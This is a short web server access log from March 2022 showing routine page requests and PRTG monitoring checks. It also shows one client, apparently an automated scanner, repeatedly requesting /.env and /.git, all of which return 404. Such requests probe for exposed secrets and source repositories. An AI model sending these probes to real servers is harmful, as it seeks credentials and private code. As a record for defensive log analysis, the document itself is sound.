45.134.144.129 - - [03/Mar/2022:19:58:29 +0100] "\x16\x03\x03" 501 318 "-" "-"
45.134.144.129 - - [03/Mar/2022:19:58:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"
212.91.246.72 - - [03/Mar/2022:19:58:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Mar/2022:19:59:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
62.210.130.209 - - [03/Mar/2022:19:59:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
62.210.130.209 - - [03/Mar/2022:19:59:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
62.210.130.209 - - [03/Mar/2022:19:59:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
62.210.130.209 - - [03/Mar/2022:19:59:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
62.210.130.209 - - [03/Mar/2022:19:59:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
62.210.130.209 - - [03/Mar/2022:19:59:59 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
62.210.130.209 - - [03/Mar/2022:19:59:59 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
62.210.130.209 - - [03/Mar/2022:19:59:59 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
62.210.130.209 - - [03/Mar/2022:19:59:59 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
62.210.130.209 - - [03/Mar/2022:19:59:59 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
62.210.130.209 - - [03/Mar/2022:19:59:59 +0100] "GET /.git HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
62.210.130.209 - - [03/Mar/2022:19:59:59 +0100] "GET /.git HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
62.210.130.209 - - [03/Mar/2022:19:59:59 +0100] "GET /.git HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
62.210.130.209 - - [03/Mar/2022:19:59:59 +0100] "GET /.git HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
62.210.130.209 - - [03/Mar/2022:20:00:00 +0100] "GET /.git HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/Mar/2022:20:00:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.57.55.210 - - [03/Mar/2022:20:00:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
